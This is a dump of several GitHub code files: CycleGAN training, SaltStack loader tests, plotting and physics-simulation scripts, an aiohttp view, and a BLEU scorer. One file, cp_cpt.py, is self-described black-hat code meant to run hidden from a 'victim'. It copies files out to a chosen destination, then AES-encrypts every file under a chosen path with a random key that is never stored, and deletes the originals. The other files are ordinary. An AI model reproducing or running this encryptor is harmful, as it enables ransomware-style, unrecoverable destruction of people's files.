Train\ntrain_dataset = tf.data.Dataset.zip((train_dogs, train_cats))\ncyclegan.compile()\ncyclegan.fit(train_dataset,\n             batch_size = BATCH_SIZE,\n             epochs = EPOCHS,\n             initial_epoch = 0,\n             steps_per_epoch = steps_per_epoch,\n             callbacks = callbacks)\ncyclegan.save_weights(\"model_vae_faces_1e4.h5\")\n\n\ndef generate_images(model, test_input, figname):\n    prediction = model(test_input)\n\n    plt.figure(figsize=(12, 12))\n\n    display_list = [test_input[0], prediction[0]]\n    title = ['Input Image', 'Predicted Image']\n\n    for i in range(2):\n        plt.subplot(1, 2, i + 1)\n        plt.title(title[i])\n        # getting the pixel values between [0, 1] to plot it.\n        plt.imshow(display_list[i] * 0.5 + 0.5)\n        plt.axis('off')\n    plt.savefig(figname)\n\n# Run the trained generator on a few training samples\nfor idx, inp in enumerate(train_dogs.take(5)):\n    generate_images(cyclegan.generator_g, inp, f\"testimage_{idx+1}\")","repo_name":"manuel-suarez/homework-ml2-cycle-gan-model-cats-vs-dogs","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12851563124","text":"import warnings\n\nimport pytest\nfrom saltfactories.utils import random_string\n\nimport salt.config\nimport salt.loader\nfrom salt.loader.lazy import LazyLoader\n\n\n@pytest.fixture(scope=\"module\")\ndef loaded_base_name():\n    return random_string(\"{}.\".format(__name__), digits=False, uppercase=False)\n\n\n@pytest.fixture(scope=\"module\")\ndef opts(loaded_base_name):\n    return salt.config.minion_config(None)\n\n\ndef _loader_id(value):\n    return value[0]\n\n\n@pytest.fixture(\n    params=(\n        (\"static_loader\", (\"modules\", \"test\")),\n        (\"raw_mod\", (\"test\", None)),\n        (\"minion_mods\", ()),\n        (\"metaproxy\", ()),\n        (\"matchers\", ()),\n        (\"engines\", (None, None, None)),\n        (\"proxy\", ()),\n        (\"returners\", (None,)),\n        (\"utils\", ()),\n        (\"pillars\", (None,)),\n        (\"tops\", ()),\n        (\"wheels\", ()),\n        (\"outputters\", ()),\n        (\"serializers\", ()),\n        (\"eauth_tokens\", ()),\n        (\"auth\", ()),\n        (\"fileserver\", (None,)),\n        (\"roster\", ()),\n        (\"thorium\", (None, None)),\n        (\"states\", (None, None, None)),\n        (\"beacons\", (None,)),\n        (\"log_handlers\", ()),\n        (\"ssh_wrapper\", ()),\n        (\"render\", (None,)),\n        (\"grain_funcs\", ()),\n        (\"runner\", ()),\n        
(\"queues\", ()),\n (\"sdb\", ()),\n (\"pkgdb\", ()),\n (\"pkgfiles\", ()),\n (\"clouds\", ()),\n (\"netapi\", ()),\n (\"executors\", ()),\n (\"cache\", ()),\n ),\n ids=_loader_id,\n)\ndef loader(request, opts, loaded_base_name):\n loader_name, loader_args = request.param\n loader = getattr(salt.loader, loader_name)(\n opts, *loader_args, loaded_base_name=loaded_base_name\n )\n try:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n # Force loading all functions\n list(loader)\n yield loader\n finally:\n if not isinstance(loader, LazyLoader):\n for loaded_func in loader.values():\n loader = loaded_func.loader\n break\n if isinstance(loader, LazyLoader):\n loader.clean_modules()\n\n\ndef test_loader(loader, loaded_base_name):\n if not isinstance(loader, LazyLoader):\n for loaded_func in loader.values():\n loader = loaded_func.loader\n loader_tag = loader.tag\n assert loader.loaded_base_name == loaded_base_name\n module_name = loaded_func.func.__module__\n try:\n assert module_name.startswith(loaded_base_name)\n except AssertionError:\n if loader_tag != \"utils\":\n raise\n else:\n loader_tag = loader.tag\n assert loader.loaded_base_name == loaded_base_name\n for func_name in list(loader._dict):\n module_name = loader[func_name].__module__\n try:\n assert module_name.startswith(loaded_base_name)\n except AssertionError:\n if loader_tag != \"utils\":\n raise\n","repo_name":"saltstack/salt","sub_path":"tests/pytests/functional/loader/test_loaded_base_name.py","file_name":"test_loaded_base_name.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"42782937514","text":"#Libraries for Data Visualization\n\nimport pandas as pd\nimport matplotlib.pyplot as plt \nimport matplotlib.patches as mpatches\nimport numpy as np \nimport seaborn as sns\nimport time\nimport pandas_profiling as pp\n\nfrom sklearn.preprocessing import StandardScaler, RobustScaler #Scaling Time and Amount\nfrom mpl_toolkits import mplot3d\nfrom sklearn.feature_selection import SelectKBest, mutual_info_classif, RFECV\nfrom sklearn.model_selection import StratifiedKFold, learning_curve, StratifiedShuffleSplit, ShuffleSplit\nfrom sklearn.metrics import f1_score, precision_score, precision_recall_fscore_support, fbeta_score, classification_report, roc_curve, roc_auc_score, confusion_matrix\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import LinearSVC, SVC\nfrom sklearn.ensemble import AdaBoostClassifier, RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\n\n\n## Visualizations functions\n\ndef histograms(series):\n if isinstance(series,pd.Series):\n mn=int(min(series))\n mx=int(max(series))\n n_bins=len(range(mn,mx))+1\n ax=sns.distplot(series,n_bins,kde=False)\n ax.set_title('{}'.format(series.name))\n plt.show()\n elif isinstance(series,pd.DataFrame):\n cols=series.columns\n length=len(cols)\n if length%4==0:\n n_rows=4\n n_columns=length//4\n else:\n n_rows=4\n n_columns=length//4+1\n \n fig, axis=plt.subplots(nrows=n_rows,ncols=n_columns)\n for i in range(length):\n mn=int(min(series[cols[i]]))\n mx=int(max(series[cols[i]]))\n n_bins=len(range(mn,mx))+1\n sns.distplot(series[cols[i]],n_bins,kde=False,ax=axis.flatten()[i])\n axis.flatten()[i].set_title(cols[i])\n plt.show()\n else:\n raise ValueError('Please use pd.Series or pd.DataFrame as argument.')\ndef boxplots(series):\n if isinstance(series,pd.Series):\n ax=sns.boxplot(series)\n 
ax.set_title('{}'.format(series.name))\n        plt.show()\n    elif isinstance(series,pd.DataFrame):\n        cols=series.columns\n        length=len(cols)\n        if length%2==0:\n            n_rows=2\n            n_columns=length//2\n        else:\n            n_rows=2\n            n_columns=length//2+1\n\n        fig, axis=plt.subplots(nrows=n_rows,ncols=n_columns)\n        for i in range(length):\n            sns.boxplot(series[cols[i]],ax=axis.flatten()[i])\n            axis.flatten()[i].set_title(cols[i])\n        plt.show()\n    else:\n        raise ValueError('Please use pd.Series or pd.DataFrame as argument.')\ndef countplots(series):\n    if isinstance(series,pd.Series):\n        ax=sns.countplot(series)\n        ax.set_title('{}'.format(series.name))\n        plt.show()\n    elif isinstance(series,pd.DataFrame):\n        cols=series.columns\n        length=len(cols)\n        if length%2==0:\n            n_rows=2\n            n_columns=length//2\n        else:\n            n_rows=2\n            n_columns=length//2+1\n\n        fig, axis=plt.subplots(nrows=n_rows,ncols=n_columns)\n        for i in range(length):\n            sns.countplot(series[cols[i]],ax=axis.flatten()[i])\n            axis.flatten()[i].set_title(cols[i])\n        plt.show()\n    else:\n        raise ValueError('Please use pd.Series or pd.DataFrame as argument.')\ndef frequency_plot(df,feature,feature_to_group='LeagueId'):\n    freq_prep=df[[feature_to_group,feature]].groupby([feature_to_group]).sum()\n    counts=freq_prep[feature].values\n    leagues=freq_prep.index.values\n    length=len(leagues)\n    if length%2==0:\n        n_rows=2\n        n_columns=length//2\n    else:\n        n_rows=2\n        n_columns=length//2+1\n\n    fig, axis=plt.subplots(nrows=n_rows,ncols=n_columns)\n    for i in range(len(leagues)):\n        feature_counts=df[df[feature_to_group]==leagues[i]].groupby([feature]).count()[feature_to_group].values\n        freqs=np.asarray(feature_counts)/sum(feature_counts)\n        feature_values=df[df[feature_to_group]==leagues[i]].groupby([feature]).count()[feature_to_group].index.values\n        sns.barplot(x=feature_values,y=freqs,ax=axis.flatten()[i])\n        axis.flatten()[i].set_title('{} : {}'.format(feature_to_group,leagues[i]))\n    plt.suptitle('{}'.format(feature))\n    plt.show()\n\n## Import Data\n\ninput_df=pd.read_csv('StudentsPerformance.csv')\ndf=input_df.copy(deep=True)\n\nprint('\\n\\n ============ Printing df head and create profile ============= \\n\\n')\n\nprint(df.head())\nprint(df.shape)\n\nprint(df.dtypes)\n\n## Pandas Profiling\n\ntry:\n    fn=open('pandas_profiling_1.html')\n    fn.close()\nexcept:\n    print('\\n---- No profile exists yet. Creating profile. ----\\n')\n    profile=df.profile_report(title='Pandas Profiling Report')\n    profile.to_file(output_file='pandas_profiling_1.html')\n\n## Plots\n\nsns.scatterplot(data=df,x='writing score',y='math score',hue='test preparation course')\nplt.show()\n\nsns.heatmap(df.corr(),annot=True,cmap='PuBu')\nplt.show()\n\nsns.pairplot(data=df,hue='race/ethnicity',diag_kind='kde',kind='scatter')\nplt.show()\n\nsns.catplot(data=df,x='race/ethnicity',kind='count',hue='gender',row='test preparation course',col='lunch')\nplt.show()\n\nsns.catplot(data=df,x='race/ethnicity',y='math score',kind='violin',hue='gender',row='test preparation course',col='lunch')\nplt.show()","repo_name":"pedro-m-leal/Student_Grades","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74279037370","text":"#####################################################################\n# This file is for doing whatever and probably shouldn't have been #\n# committed to Github, but there's an error in removing it so we #\n# have to live with it now, I guess. 
#\n#####################################################################\nfrom __future__ import print_function, division\nimport os\nimport sys\n\n\"\"\"Open MP and MKL should speed up the time required to run these simulations!\"\"\"\n# threads = sys.argv[1]\nthreads = 16\nos.environ['NUMEXPR_MAX_THREADS'] = '{}'.format(threads)\nos.environ['NUMEXPR_NUM_THREADS'] = '{}'.format(threads)\nos.environ['OMP_NUM_THREADS'] = '{}'.format(threads)\nos.environ['MKL_NUM_THREADS'] = '{}'.format(threads)\n# line 4 and line 5 below are for development purposes and can be removed\nfrom quspin.operators import hamiltonian, exp_op, quantum_operator  # operators\nfrom quspin.basis import spinful_fermion_basis_1d  # Hilbert space basis\nfrom quspin.tools.measurements import obs_vs_time  # calculating dynamics\nfrom quspin.tools.evolution import evolve  # evolving system\nimport numpy as np  # general math functions\nfrom time import time  # tool for calculating computation time\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt  # plotting library\nfrom scipy.signal.windows import blackman\nfrom scipy import fftpack\nfrom scipy.interpolate import UnivariateSpline\nfrom quspin.tools.measurements import project_op\nfrom tools import HubbardModel as fhmodel, InitializeArchive\nimport psutil\nimport pandas as pd\nimport seaborn as sns\n\n\n\n# note cpu_count for logical=False returns the wrong number for multi-socket CPUs.\nprint(\"logical cores available {}\".format(psutil.cpu_count(logical=True)))\nt_init = time()\nnp.__config__.show()\n\n\n########################################################################################################################\n# Declare Parameters of system to be loaded\n########################################################################################################################\n\n\"\"\"Laser Pulse parameters\"\"\"\nfield = 32.9  # field angular frequency THz\nF0 = 10  # Field amplitude MV/cm\na = 4  # Lattice constant Angstroms\n\n\"\"\"Parameters for a target or reference field\"\"\"\n# Hubbard model\nL = 10  # system size\nN_up = L // 2 + L % 2  # number of fermions with spin up\nN_down = L // 2  # number of fermions with spin down\nN = N_up + N_down  # number of particles\nt0 = 0.52  # hopping strength\nU = 0.00 * t0  # interaction strength\npbc = True\n\n# Parameters for evolving the system\ncycles = 10  # time in cycles of field frequency\nn_steps = 10000  # Number of steps for time resolution\n\n########################################################################################################################\n# Do you need to compare these results to something else?\n########################################################################################################################\ncompare = True\n\nif compare:\n    sim_type_to_compare = 0\n    comp = fhmodel(\n        nx=L,  # L for system you want to compare to (should be the same)\n        hopping=t0,  # t0 of system you want to compare to (should be the same)\n        interaction=0.0,  # U of system you want to compare to\n        n_up=N_up,  # (should be the same)\n        n_down=N_down,  # (should be the same)\n        angular_frequency=field,  # (should be the same)\n        lattice_constant=a,  # a of system you want to compare to\n        field_amplitude=4.0,  # (should be the same)\n        chem_potential=0,  # (should be the same)\n        cycles=cycles,  # (should be the same)\n        n_steps=10000,  # number of steps for system you want to compare to\n        ny=0,  # 1D simulations do not use y-axis\n        soc=0,  # No spin orbit coupling\n        gamma=0,  # No gamma\n        tracking=False,  # Are you comparing to 
a field for tracking\n        int_track=1  # If so, you need to list the U for the system you are tracking to\n    )\n    comp_lib = InitializeArchive(directory_number=sim_type_to_compare).get_dir()\n    comp_path = comp_lib['data path']\n    comp_tag = comp_lib['tag'] + comp.tag\n    comp_file = np.load(comp_path + comp_tag + '.npz')\n    comp_phi = UnivariateSpline(comp_file['times'], comp_file['phi'], k=3, s=0)\n    comp_J = UnivariateSpline(comp_file['times'], comp_file['current'], k=3, s=0)\n\n########################################################################################################################\n# Load the relevant file\n########################################################################################################################\n# Reference: 0 for Targets, 1 for Tracking, 2 for superoscillations, 3 for importing anything else\nsim_type_to_be_loaded = 1\n\n# Target the file to be loaded\nloader = InitializeArchive(directory_number=sim_type_to_be_loaded).get_dir()\nload_path = loader['data path']\nload_tag = loader['tag']\n\n# If pasting a direct location, use this\n#loadfile = './Data/BestFit_SCF/SCFparams_10sites-0,049TrackedTo0,000U-0,52t0-4,5F0-4TrackedTo4a-10cycles-4000steps_N133pulses.npz'\n# Otherwise have the class file find it for you\n\nmodU = np.array([0.025, 0.05, 0.075, 0.0875, 0.09375, 0.1])\nmodU *= t0\npulses = np.array([25, 50, 100, 200, 400, 800])\nloadingreaping = np.array([True, True, True, True, True, False])\nloadingwithoutreaping = np.array([False, False, False, False, False, False])\ncounter = np.array([0, 1, 2, 3, 4, 5])\n\n# Now build directory for saving files\ndirectory = InitializeArchive(directory_number=3)\nlib = directory.get_dir()\n\ndata_path = lib['data path']\nplot_path = lib['plots path']\nplot_name = lib['plot name']\nfiletag = lib['tag'] + comp.tag\n#filetag = lib['tag'] + 'params_10sites-0,049TrackedTo0,000U-0,52t0-4,5F0-4TrackedTo4a-10cycles-4000steps_N133pulses'\n\nparams = dict(\n    nx=L,\n    hopping=t0,\n    n_up=N_up,\n    n_down=N_down,\n    angular_frequency=field,\n    lattice_constant=a,\n    field_amplitude=F0,\n    chem_potential=0,\n    cycles=cycles,\n    n_steps=n_steps,\n    ny=0,  # 1D simulations do not use y-axis\n    soc=0,  # No spin orbit coupling\n    gamma=0,  #\n    tracking=True,  # Are you loading a field for tracking\n    int_track=0,  # If so, you need to list the U for\n    scf=True,\n)\nreapingloadfile = []\nnoreapingloadfile = []\nU_tracker = []\npulses_tracker = []\nfor _ in modU:\n    params['interaction'] = _\n    for c in counter:\n        # Bundle parameters to pass to Hubbard Model class for unit conversion\n        params['pulses'] = pulses[c]\n        params['reaping'] = loadingreaping[c]\n        here = fhmodel(**params)\n        reapingloadfile.append(load_path + load_tag + fhmodel(**params).tag + '.npz')\n        U_tracker.append(_)\n        pulses_tracker.append(pulses[c])\n        print('Gained loading location: {}'.format(reapingloadfile[-1]))\n        params['reaping'] = loadingwithoutreaping[c]\n        noreapingloadfile.append(load_path + load_tag + fhmodel(**params).tag + '.npz')\n        print('Gained loading location: {}'.format(noreapingloadfile[-1]))\n\n# get the converted units for creating a target field\nstart = 0.0\nstop = here.stop\ntimes, dt = np.linspace(start, stop, num=n_steps, endpoint=True, retstep=True)\n\nphi_holder = []\nJ_holder = []\nerror_tracker = []\n\nfor _ in noreapingloadfile:\n    load = np.load(_)\n    phi_interp = UnivariateSpline(load['times'], load['phi'], k=3, s=0)\n    J_interp = UnivariateSpline(load['times'], load['current'], k=3, s=0)\n    phi_holder.append([phi_interp(load['times'])])\n    
J_holder.append([J_interp(load['times'])])\n    error_tracker.append(float(load['error']))\n\n\n\n########################################################################################################################\n# Plot results?\n########################################################################################################################\n\n\nfignum = 1\n\nplt.figure(fignum)\nfignum += 1\nerror_tracker = np.array(error_tracker)\ns = 10 * error_tracker / error_tracker.min()\nplt.scatter((np.array(U_tracker)*1/t0), np.log10(np.array(error_tracker)), s=pulses_tracker, c=pulses_tracker,\n            cmap='spring', alpha=0.6)\nplt.colorbar(cmap='spring')\nplt.xlabel('U ($t_0$)')\nplt.ylabel('log$\\\\int Error^2 dt$')\nplt.tight_layout()\nplt.show()\n\n\ndef plot_spectrum(f, t, sim, **kwargs):\n    \"\"\"\n    Plot the High Harmonic Generation spectrum\n    \"\"\"\n    # Power spectrum emitted is calculated using the Larmor formula\n    # (https://en.wikipedia.org/wiki/Larmor_formula)\n    # which says that the power emitted is proportional to the square of the acceleration\n    # i.e., the RHS of the second Ehrenfest theorem\n\n    N = len(f)\n    k = np.arange(N)\n\n    # frequency range\n    omegas = (k - N / 2) * np.pi / (0.5 * t.max())\n\n    # spectra of the signal\n    spectrum = np.abs(\n        # uses a windowed Fourier transform to calculate the spectra\n        # http://docs.scipy.org/doc/scipy/reference/tutorial/fftpack.html\n        fftpack.fft((-1) ** k * blackman(N) * f)\n    ) ** 2\n    spectrum /= spectrum.max()\n    plt.semilogy(omegas / sim.omega, spectrum, **kwargs)\n    plt.ylabel('spectrum (arbitrary units)')\n    plt.xlabel(r'frequency / $\\omega$')\n    plt.xlim([0, 20])\n    plt.ylim([1e-15, 1.])\n\n\n\"\"\"colouring = list(\n    plt.cm.get_cmap('plasma')(np.linspace(0., 0.8, 4))\n    )\n\nplt.figure(fignum)\nfignum += 1\nplt.plot(times_target, tgt_current_interp(times_target), color=colouring[0])\nplt.plot(times_target, tgt_phi_interp(times_target), color=colouring[1])\nplt.plot(times, track_current_interp(times), color=colouring[2])\nplt.plot(times, track_phi_interp(times), color=colouring[3])\nplt.legend(['Target J', 'Target $\\\\Phi$', 'Track J', 'Track $\\\\Phi$'])\nplt.xlabel('Time')\n\n\n\nplt.figure(fignum)\nfignum += 1\nplot_spectrum(tgt_current, times_target, tgt, color=colouring[0])\nplot_spectrum(tgt_phi, times_target, tgt, color=colouring[1])\nplot_spectrum(track_current, times, track, color=colouring[2])\nplot_spectrum(track_phi, times, track, color=colouring[3])\nplt.legend(['Target J', 'Target $\\\\Phi$', 'Track J', 'Track $\\\\Phi$'])\nplt.show()\"\"\"\n\n","repo_name":"dibondar/superoscilations","sub_path":"superoscillations_for_quantum_control/Sandbox.py","file_name":"Sandbox.py","file_ext":"py","file_size_in_byte":10278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7606426346","text":"\nfrom aiohttp import web\n\nfrom db import question\n\nasync def index(request):\n    async with request.app['db'].acquire() as conn:\n        cursor = await conn.execute(question.select())\n        ret = []\n        async for row in cursor:\n            ret.append(row.question_text)\n        return web.json_response(ret)\n","repo_name":"fidemin/first-aiohttp","sub_path":"server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18733979745","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# written in pure python and usual libs\n# BORN TO CODE \n\n# IMPROVEMENTS ARE WELCOME.\n# THIS IS A SKELETON.\n
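# NOTE: requires Python 3 with PyCryptodome (pip install pycryptodome);\n# AES.new() expects byte strings for both the key and the IV.\n# 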
@mrx6SO\n\n# Visit: https://github.com/mrx6SO/\n\n# late night is for coding. among other things....\n#\n#\n# the world is a secure place, trust in this...\n# educational purposes only. for sure. \n\n# this is pure black hat, and how to defend ourselves from this kind of attack...\n\n# the code will be intuitive to the attacker and hidden to the 'victim'. If correctly adapted... \n\n# flying_bird.py flying like a bird \n# lol\n\n# trying some py2exe \n# or some physical access\n# or do it in your lab : - )\n\n# i don't care... really \n\n# echo \n# echo\n# echo $LetsMoveOnKiddon$\n\n\n# so, the first thing is to import the modules.\n# all knowledge for us. \n# so, lets move on, kiddo - Mr Robot reference, in case someone doesn't know. lol \n\n\n# those libs are available for windows too\n# i forget the name...other time i'll fix it...\n\nfrom Crypto.Hash import SHA256\nfrom Crypto.Cipher import AES\n\n# basic libs\n\nimport os\nimport random\nimport sys\nimport pkg_resources\n\nimport re  # to check the files\nimport shutil  # for the copy\nimport time  # delay between execution of functions\nimport easygui  # for GUI stuffs\nimport string  # for the password method \n\n# function to find the files\n\ndef find_files(pattern, path):\n\n    for path, dirs, files in os.walk(path):\n\n        for fname in files:\n\n            full_file_name = os.path.join(path, fname)  # join into path and all files\n            \n            match = re.match(pattern, full_file_name)  # check if the file has a matched pattern \n\n            if(match):  # conditional for the match\n\n                yield full_file_name  # will save that until next return. \n\n\n# function that copies matched files to the destination path / pendrive / email\n\ndef copy_files(pattern, src_path, dest_path): \n\n    \"\"\"\n    function receives 3 arguments:\n    \n    - pattern of files : '.'\n    - src_path = 'source path', where files are located\n    - dest_path = 'destination path', where the files will be copied\n    \n    \"\"\"\n\n    for full_file_name in find_files(pattern,src_path):  # here the yield will be called \n\n        print(full_file_name + ' file was copied into ' + dest_path) \n\n        try: \n            \n            shutil.copy(full_file_name, dest_path)  # made the copy of files into defined path\n\n        except IOError:  # in case of some error of input/output\n\n            return  # return to function \n\n# set up cryptography - I chose AES \n\ndef encrypt(key, filename):\n    \n    chunksize = 64 * 1024\n    outFile = os.path.join(os.path.dirname(filename), '.hell'+os.path.basename(filename))\n    filesize = str(os.path.getsize(filename)).zfill(16)\n\n    IV = b''\n    \n    for i in range(16):\n        IV += bytes([random.randint(0, 0xFF)])\n    \n    encryptor = AES.new(key, AES.MODE_CBC, IV)\n    \n    with open(filename, 'rb') as infile:\n        with open(outFile, 'wb') as outfile:\n            outfile.write(filesize.encode())\n            outfile.write(IV)\n\n            while True:\n\n                chunk = infile.read(chunksize)\n                \n                if len(chunk) == 0:\n                    break\n                \n                elif len(chunk) % 16 != 0:\n                    chunk += b' ' * (16 - (len(chunk) % 16))\n                \n                outfile.write(encryptor.encrypt(chunk))\n                \n    \n# append the files found on the current directory\n\ndef allfiles(path):\n\n    allFiles = []\n    \n    for root, subfiles, files in os.walk(path):\n        for names in files:\n            allFiles.append(os.path.join(root, names))\n    \n    return allFiles\n    \n# key to guarantee singularity in the functions\n\ndef generated_key(size):\n\n    
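# NOTE: random.choice() is not cryptographically secure; for real key\n    # material Python's 'secrets' module would be the safer choice\n    caracters = 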
'~{}^=+()@#$%*¨\\/[]&ABCDEFGHIJKLMNOPQRSTUVXZY0123456789abcdefghijlmnopqrstuwvxz0123456789'\n    ps = ''\n\n    for char in range(size):\n\n        ps += random.choice(caracters)\n\n    return ps\n\n\ndef done_crypt():\n\n    #easygui.msgbox('Crypting system')\n\n    choice = True\n    #choice = raw_input(\"Do you want to (E)ncrypt or (D)ecrypt? \")\n    \n    encfiles = easygui.enterbox(\"Choose the path to encrypt\")\n    allfiles(encfiles)\n    encFiles = allfiles(encfiles)\n    #(allfiles('C:\\\\teste')\n    key = generated_key(16)\n\n    #password = generated_key(16)\n\n    if(choice):\n\n        for Tfiles in encFiles:\n\n            if os.path.basename(Tfiles).startswith(\".hell\"):\n\n                print(\"%s is already encrypted\" % str(Tfiles))\n\n                pass\n            \n            elif Tfiles == os.path.join(encfiles, sys.argv[0]):\n\n                pass\n\n            else:\n\n                encrypt(SHA256.new(key.encode()).digest(), str(Tfiles))\n\n                print(\"Done encrypting %s\" % str(Tfiles))\n                \n                os.remove(Tfiles)\n    \ndef done_cp():\n\n    #while True:\n\n        # try:\n        \n    patt = '.'  #the pattern\n    \n    if(os.name == 'nt'):  # if system is Windows based\n\n        # \"\"\"\n\n        # select the source to do the copy\n        # select destination path that will receive the previously copied files\n\n        # : the pattern is '.' cause it gets all the extensions\n        # if is needed set up one or many different extension\n        #: just modify the part of code that handle with it\n\n        #\"\"\" \n\n        #print('source path must be, for ex. | C:\\\\Users | with 2 slashs.')\n        #src = raw_input('Source path: ')\n        #dst = raw_input('Destination path: ')\n        \n       # easygui.msgbox('Smooth Backup Encrypt and desencrypt')\n        \n        src = easygui.enterbox('Source')\n        dst = easygui.enterbox('Destination')\n\n        copy_files(patt, src, dst)\n        time.sleep(1)\n\n    elif(os.name == 'posix'):  # if it's a Unix system\n        \n        #srce = raw_input('Source path: ')\n        #destin = raw_input('Destination path: ')\n        \n        #easygui.msgbox('Smooth Baackup')\n        \n        srce = easygui.enterbox('Source: ')\n        destin = easygui.enterbox('Destination: ')\n\n        copy_files(patt, srce, destin)\n        time.sleep(2)\n\n    else:\n\n        pass\n    \n
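# WARNING: done_crypt() derives the AES key from a random string that is\n# generated per run and never written anywhere, so encrypted files cannot be\n# recovered afterwards; persist the key first if decryption is ever needed.\n\n# calling the functions... 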
simple way...\n\ndef main():\n\n    while True:\n\n        try:\n\n            done_cp()\n\n        except:\n\n            pass\n\n        try:\n            \n            done_crypt()\n\n        except:\n\n            return\n    \n    \nif __name__ == \"__main__\":\n\n    main()\n","repo_name":"mrx6SO/backup_then_encrypt","sub_path":"cp_cpt.py","file_name":"cp_cpt.py","file_ext":"py","file_size_in_byte":6961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"225676905","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n# **************************\n# * Author      : baiyyang\n# * Email       : baiyyang@163.com\n# * Description : implements BLEU, supporting both Chinese and English\n# * create time : 2018/5/11 3:47 PM\n# * file name   : bleu.py\n\n\nimport os\nimport argparse\nimport math\n\n\ndef read_data(candidate_filename, reference_file):\n    \"\"\"\n    Read the candidate file and the reference file(s)\n    :param candidate_filename: candidate file\n    :param reference_file: reference file; can be a directory or a single file\n    :return:\n    \"\"\"\n    candidates = []\n    references = []\n    with open(candidate_filename, \"r\", encoding=\"utf-8\") as fr:\n        for line in fr:\n            candidates.append(line.strip())\n    if \".txt\" in reference_file:\n        with open(reference_file, \"r\", encoding=\"utf-8\") as fr:\n            reference = []\n            for line in fr:\n                reference.append(line.strip())\n            references.append(reference)\n    else:\n        for root, _, files in os.walk(reference_file):\n            for file in files:\n                reference = []\n                with open(os.path.join(root, file), \"r\", encoding=\"utf-8\") as fr:\n                    for line in fr:\n                        reference.append(line.strip())\n                references.append(reference)\n    return candidates, references\n\n\ndef calculate_ngram(candidates, references, n, language):\n    count_clip = 0\n    count = 0\n    for index, candidate in enumerate(candidates):\n        references_list = lines2dic(references, index, n, language)\n        if language == \"en\":\n            words = candidate.split()\n        else:\n            words = candidate\n        limit = len(words) - n + 1\n        candidate_dic = {}\n        for i in range(limit):\n            key = \" \".join(words[i: i+n]).lower() if language == \"en\" else words[i: i+n]\n            if key in candidate_dic.keys():\n                candidate_dic[key] += 1\n            else:\n                candidate_dic[key] = 1\n        count_clip += clip(candidate_dic, references_list)\n        count += limit\n    if count_clip == 0:\n        pr = 0\n    else:\n        pr = float(count_clip) / count\n    return pr\n\n\ndef brevity_penalty(candidates, references, language):\n    c = 0\n    r = 0\n    for index, candidate in enumerate(candidates):\n        c_length = len(candidate.split()) if language == \"en\" else len(candidate)\n        reference_index = [reference[index] for reference in references]\n        r_lengths = [len(r.split()) if language == \"en\" else len(r) for r in reference_index]\n        c += c_length\n        r += match_reference(c_length, r_lengths)\n    if c > r:\n        bp = 1\n    else:\n        bp = math.exp(1 - float(r) / c)\n    return bp\n\n\ndef match_reference(candidate_len, reference_lens):\n    \"\"\"\n    Find the reference length that best matches the candidate length (used when c <= r)\n    :param candidate_len:\n    :param reference_lens:\n    :return:\n    \"\"\"\n    best_len = abs(reference_lens[0] - candidate_len)\n    best_ref = reference_lens[0]\n    for length in reference_lens:\n        if abs(length - candidate_len) < best_len:\n            best_len = abs(length - candidate_len)\n            best_ref = length\n    return best_ref\n\n\ndef clip(candidate, references):\n    count = 0\n    for cand in candidate.keys():\n        cand_value = candidate[cand]\n        max_count = 0\n        for reference in references:\n            if cand in reference.keys():\n                max_count = max(reference[cand], max_count)\n        count += min(max_count, cand_value)\n    return count\n\n\ndef lines2dic(references, index, n, language):\n    reference_list = []\n    for reference in references:\n        reference_dic = {}\n        line = reference[index]\n        
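# for Chinese input the line is sliced character by character below,\n        # so no separate tokenisation step is needed\n        if 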
language == \"en\":\n words = line.split()\n else:\n words = line\n limit = len(words) - n + 1\n for i in range(limit):\n key = \" \".join(words[i: i+n]).lower() if language == \"en\" else words[i: i+n]\n if key in reference_dic.keys():\n reference_dic[key] += 1\n else:\n reference_dic[key] = 1\n reference_list.append(reference_dic)\n return reference_list\n\n\ndef geometric_mean(precisions):\n return math.exp(sum([math.log(p) if p != 0 else -math.inf for p in precisions]) / len(precisions))\n\n\ndef bleu(candidate, references, language):\n precisions = []\n for i in range(1, 5):\n pr = calculate_ngram(candidate, references, i, language)\n precisions.append(pr)\n bp = brevity_penalty(candidate, references, language)\n return geometric_mean(precisions) * bp\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"BLEU calculate\")\n parser.add_argument(\"candidate\", help=\"candidate file\", type=str)\n parser.add_argument(\"reference\", help=\"reference file or dir\", type=str)\n parser.add_argument(\"language\", help=\"the language of evaluation, include en/ch\", type=str)\n args = parser.parse_args()\n can_file = args.candidate\n ref_file = args.reference\n lang = args.language\n candidate, references = read_data(can_file, ref_file)\n bleu = bleu(candidate, references, lang)\n print(\"BLEU: {}\".format(bleu))\n\n","repo_name":"baiyyang/BLEU","sub_path":"bleu.py","file_name":"bleu.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"78"} +{"seq_id":"15190897418","text":"import re\n\n\ndef strip_str(str, format_as):\n \"\"\"\n Removes unnecessary whitespaces from given `str`\n Args:\n str: string to be formatted\n format_as: [\n type of formatting to be done. takes either `url`\n or `normal`. 
